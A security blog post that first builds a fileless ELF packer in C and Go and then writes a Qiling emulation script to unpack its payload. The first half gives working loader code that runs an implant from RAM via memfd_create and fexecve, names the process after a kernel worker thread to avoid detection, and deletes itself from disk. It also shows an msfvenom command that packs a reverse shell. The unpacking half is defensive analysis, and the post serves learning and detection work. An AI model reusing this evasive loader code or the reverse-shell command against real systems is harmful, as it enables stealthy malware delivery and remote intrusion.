Unpacking In-Memory Malware with Qiling

Malware engineering often relies on harnessing various operating system primitives to execute and proliferate a sample without detection. Linux is no different to this, and today, we’ll be exploring one of those primitives that have been gaining traction in malwares seen in Linux-based IoT devices and servers.

The Linux kernel 3.17 introduced two new accompanying system calls, memfd_create and fexecve, which allows for the creation and execution of anonymous files backed by RAM without the need for those files to actually exist on disk. Looking at memfd_create’s manpages:

SYNOPSIS
       int memfd_create(const char *name, unsigned int flags);

DESCRIPTION
       memfd_create() creates an anonymous file and returns a file
       descriptor that refers to it.  The file behaves like a regular
       file, and so can be modified, truncated, memory-mapped, and so
       on.  However, unlike a regular file, it lives in RAM and has a
       volatile backing storage.  Once all references to the file are
       dropped, it is automatically released.

As you may have already figured out, this makes for a very attractive payload delivery and evasion technique, and have enabled malware such as those that abuse the Ezuri loader to successfully exist out in the wild, where dropped samples evade initial detection, by loading and executing programs in-memory.

Many really good blog posts have already talked about these syscalls and their capabilities in developing malware, but in this post, we’re going to do things a little differently and take a different two-fold approach:

  • First, let’s develop our own simple “offensive packer”, which will harness this fileless technique to create a packed dropper that loads our implant and removes itself from disk after execution.
  • Then, switching gears completely, and using dynamic emulation to detect and unpack the original ELF sample from the packed executable.

Pack it up!

Let’s write an ELF packer! We’ll implement something that works in the following manner with Golang:

  1. Compile a stub program, which will parse itself and extrapolate the implant also attached with it that we want to execute, and map and execute it in-memory. We’ll rely on a modified and abridged version of the PT_NOTE infection vector: storing the file offset and size for the compressed implant in the PT_NOTE segment present in every ELF (except Golang and proprietary executables).
  2. The original payload that we want to execute in-memory is injected in our stub, and the PT_NOTE segment if modified to point to it.
  3. The packed stub can now run, load the payload, and delete itself from disk as it executes in-memory.

For both simplicity and personal preference, we’ll be refraining from writing a loader that reads an ELF through a network socket, but instead packing and distributing the compressed/encrypted executable together with the stub program that loads it. This deviates from the norm that some loaders/droppers have to remain truly “fileless”, but does mitigate away the need for relying on networking facilities to drop a shell.

This packer, which I’ve called ward, is open-sourced here! I’ll incorporate snippets of the source code to demonstrate the core concepts that we want to implement for brevity, but please check out the full implementation and source for more in-depth understanding of its functionality.

The first step is to implement our stub program, which will be in C. Our technique requires us to first parse ourselves so that we can retrieve ELF metadata:

// open ourselves for reading
if ((fd = open(argv[0], O_RDONLY, 0)) < 0)
    die(-1, "cannot read ourselves as file");

// check if valid binary version
if (elf_version(EV_CURRENT) == EV_NONE)
    die(-1, elf_errmsg(-1));

// check if ELF magic number is present
if ((e = elf_begin(fd, ELF_C_READ, NULL)) == NULL)
    die(-1, elf_errmsg(-1));

// parse out number of program headers
size_t n;
int ret = elf_getphdrnum(e, &n);
if (ret != 0)
    die(-1, "cannot parse any program headers");

Then, find the first PT_NOTE segment, and retrieve two attributes: p_filesz and p_offset, which denote the file size and offset of the prospective packed file we want to read:

// parse out number of program headers
size_t n;
int ret = elf_getphdrnum(e, &n);
if (ret != 0)
    die(-1, "cannot parse any program headers");

// get the first PT_NOTE segment we find
GElf_Phdr* phdr = NULL;
for (size_t i = 0; i < n; i++) {
    GElf_Phdr tmp;
    if (!gelf_getphdr(e, i, &tmp))
        die(-1, "cannot get program header");

    if (tmp.p_type == PT_NOTE) {
        phdr = &tmp;
        break;
    }
}   

if (!phdr)
    die(-1, "cannot find PT_NOTE segment to further parse");

// get attributes for PT_NOTE segment
Elf64_Off offset = phdr->p_offset;
Elf64_Xword size = phdr->p_filesz;

With this information, we’re now able to parse out the compressed executable we’ve appended to the binary, and get it ready for in-memory execution. This is also a good time to incorporate any type of decryption, such as done in Ezuri with AES, but we’ll leave that TODO for a future revision.

// read packed executable from file offset
char data[size];
lseek(fd, 0, SEEK_SET);
lseek(fd, offset, SEEK_SET);
pread(fd, (void*) data, size, offset);
close(fd);

As per manpage specifications, memfd_create requires an identifier for the anonymous file that’s to be loaded, which will appear under /proc/self/fd/ , so we’ll use play sneaky and name our eventual process as an arbitrary kernel worker thread to avoid detection:

#define TEMPFILE "[kworker/1:1]"

/* safely write buffer to a given input file descriptor */
static void write_fd(int fd, const char *str, size_t len)
{
    size_t cnt = 0;
    do {
        ssize_t result = write(fd, str + cnt, MIN(len - cnt, 0x7ffff000));
        if (result == -1) 
            die(-1, "writing to memfd failed\n");
        cnt += result;
    } while (cnt != len);
}

...

// create anonymous file mocking a kernel worker thread
fd = memfd_create(TEMPFILE, 0);
if (fd == -1)
    die(fd, "cannot create in-memory fd for code");

// get rid of ourselves on disk for more sneaky evasion
if (remove(argv[0]) != 0)
    die(fd, "cannot remove self");

// write ELF data to in memory fd and execute
write_fd(fd, data, size - 1);
{
    argv[0] = TEMPFILE;
    fexecve(fd, (char * const *) argv, (char * const *) envp);
}
close(fd);

At this point, our stub program is done! We’ll move on to building our packer, which handles provisioning the stub and actually performing the injection.

In our Golang packer implementation, we’ll first provision this stub, which we can do by simply wrapping around the compiler of our choice:

// create compilation command
cmd := exec.Command("clang", "-static", "-O2", "-D_FORTIFY_SOURCE=2", "-o",
    out, "main.c", "runtime.c", "-lelf", "-lz")

// execute compilation routine to generate a new binary
if err := cmd.Run(); err != nil {
    return nil, err 
}

Once that’s done and our initial stub generated, the injection implementation can be seen here in the following snippet. Notice that rather than converting the PT_NOTE segment to PT_LOAD, which would be necessary for memory-mapping shellcode to run, we instead use it to simply point to the end of the file itself, which we’ll then append the blob of data that represents the compressed ELF. This neat little trick is a modification of the traditional and more well-known PT_NOTE infection technique, but adapted to support parsing an executable to load and redirect to.

We’ll use a fork of the debug/elf library written by the binjection folks, as it extends upon the original library by allowing one to not only read and parse the ELF binary format, but also write and patch its contents.

import "github.com/Binject/debug/elf"

...

func (inj *Injector) InjectBinary() error {

    // we only modify p_filesz to be size of packed ELF, and p_off to be offset in current file
    for _, seg := range inj.StubProgram.Progs {
        if seg.Type == elf.PT_NOTE {
            seg.Filesz = uint64(len(inj.Target))
            seg.Off = uint64(inj.Filesize)
            log.Printf("Offset: %d Size: %d\n", seg.Off, seg.Filesz)
            break
        }
    }

    // append target binary to the end of the stub host
    inj.StubProgram.InsertionEOF = inj.Target

    // get bytes from final stub state
    elfBytes, err := inj.StubProgram.Bytes()
    if err != nil {
        return nil
    }
    inj.StubProgram.Close()

    // overwrite original stub with changes in ELF format
    f, err := os.OpenFile(inj.Filepath, os.O_RDWR|os.O_CREATE|os.O_TRUNC, 0755)
    if err != nil {
        return err
    }
    f.Write(elfBytes)
    f.Close()
    return nil 
}

That’s it, our packer implementation is complete! Let’s see this in action by packing a copy of ls, and then executing it:

As we can see, running the packed stub executes ls normally, but now in-memory, and the stub itself disappears after execution! Now, we can use this do pack and load reverse shells, like say, Metasploit payloads:

$ msfvenom -p linux/x86/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell
$ ward shell

Exfiltrating the Payload

Now that we have a functional packer that handles loading our malicious executable in-memory, it’s time to switch to defense and beat our own work.

I chose to approach unpacking using dynamic emulation, specifically with the popular Qiling framework, which has now become a part of many security researchers’ arsenals for reverse engineering and vulnerability hunting. Qiling is really cool because it enables one to emulate any instruction set on any operating system, enabling one to quickly scale up dynamic analyses like building fuzzers for embedded devices.

Creating the rootfs

To start, we’ll first create the rootfs that sandboxes all the files that are relevant to the execution of our program, and exposes a small filesystem mount that is compliant to the Filesystem Hierarchy Standard for the emulated program. For many samples that one may choose to analyze, copying over the appropriate rootfs from the Qiling repository’s example/ subfolder is sufficient enough. We’ll copy over examples/rootfs/x8664_linux, which already contains some targets in /bin and a copy of a linker and glibc in /lib.

We’ll first instantiate Qiling, passing in inputs for the program we want to analyze, as well as the rootfs sandbox it’ll exist under for execution:


import sys
from qiling import *

ql = Qiling(["sample.packed"], "rootfs", stdout=sys.stdout)

Like many dynamic emulators in the open-source community, today, Qiling incorporates analysis through instrumentation, where we have the ability to hook our own custom callbacks at an instruction, syscall, or function-level to introspect their behavior or the current state of memory, or re-implement their execution behavior in some manner, as we’ll demonstrate.

As we’ve implemented in ward earlier, we want to implement focus on three different system calls: memfd_create, write and fexecve.

The memfd_create handler is simple: we’ll simply use Qiling to parse out the name for display, and return an arbitrary number to represent our file descriptor:

def memfd_create_hook(ql, name, flags, *args, **kwargs):
    """ Hooks memfd_create, parse name and return arbitrary file descriptor """
    buf = ql.mem.string(name)
    ql.log.info(f"memfd_create called, anonymous file called {buf} created")
    return 123

# memfd_create is syscall number 319
ql.set_syscall(0x13f, memfd_create_hook)

The fexecve hook is also similar, as we’ll simply halt emulation altogether and exit, “killswitching” the payload altogether:

def execve_hook(ql, fd, pathname, argv, envp, flags, *args, **kwargs):
    """ Prevent execve from running and halt """
    ql.log.info(f"Stopping execution of anonymous file")
    ql.emu_stop()

# set to syscall number 322
ql.set_syscall(0x142, execve_hook)

And as with any emulation-based unpacking script, the meat of the unpacking will exists with the write primitive that’s actually reading something into memory before execution. With our bogus file descriptor 123, we’ll simply instrument write to spit out the blob of data being read when the first syscall arg is 123. Otherwise, we’ll handle the implementation logic appropriately, where we’ll log an error and abruptly stop upon an exception, or write to the appropriate file descriptor if not the one we care about:

def write_hook(ql, write_fd, write_buf, write_count, *args, **kwargs):
    """ Instrument write only after in-memory fd is instantiated """
    regreturn = 0
    buf = ql.mem.read(write_buf, write_count)

    # stop write to stdout or stderr and output
    if (write_fd == 0x1) or (write_fd == 0x2):
        ql.log.error(f"Program error: {str(bytes(buf))}")
        sys.exit(1)

    # parse out executable if writing to our anonymous fd.
    elif (write_fd == MEMFD):

        # confirm ELF magic number
        if bytes(buf[0:4]) != b'\x7fELF':
            ql.log.error(f"Not a valid ELF executable being read!")
            sys.exit(1)

        ql.log.info("Found valid ELF! Unpacking to disk at `unpacked.elf`.")
        with open("unpacked.elf", "wb") as fd:
            fd.write(buf)

    # write to buffer normally if not with our file descriptor
    else:
        ql.os.fd[write_fd].write(buf)

    regreturn = write_count
    return regreturn

# set our final hook, and run!
ql.set_syscall(0x1, write_hook)
q.run()

Get the full unpacker script here.

With our unpacker implementation done, let’s test it out on the previous implant we’ve created earlier with ls example, as we can easily validate that the final unpacked ELF itself is in fact the original ls we packed:

Conclusion

That’s it for now! We implemented a Golang and C-based packer, which can provision and inject a target malicious ELF into a stub. We then wrote a basic Qiling script to instrument and emulate the syscalls we cared to target, dump out the executable that is to be run, and killswitching the stub before it loads and actually executes it.

Writing packers, crypters and obfuscators are fun, and are also really good learning experiences not just to understand modern techniques for backdoor development, but also gives us opportunities to use binary analysis techniques, like dynamic emulation, and popular frameworks, like Qiling, to conduct deeper analysis. Qiling has a lot more capabilities I didn’t explore in this post, and I hope to touch base on it more and other binary analysis tooling in the future!